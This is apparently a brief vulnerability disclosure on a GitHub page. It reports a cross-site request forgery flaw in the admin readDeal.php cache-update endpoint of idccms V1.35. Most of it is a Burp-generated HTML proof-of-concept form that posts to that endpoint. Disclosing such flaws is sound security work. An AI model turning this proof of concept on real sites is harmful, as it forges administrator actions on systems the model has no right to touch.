Skip to content

Latest commit

 

History

History
19 lines (15 loc) · 550 Bytes

1.md

File metadata and controls

19 lines (15 loc) · 550 Bytes

target:http://idccms.com/ version: V1.35

idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/readDeal.php?mudi=updateWebCache&_=1714026444584

POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/readDeal.php?mudi=updateWebCache&_=1714026444584" method="POST">
      
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>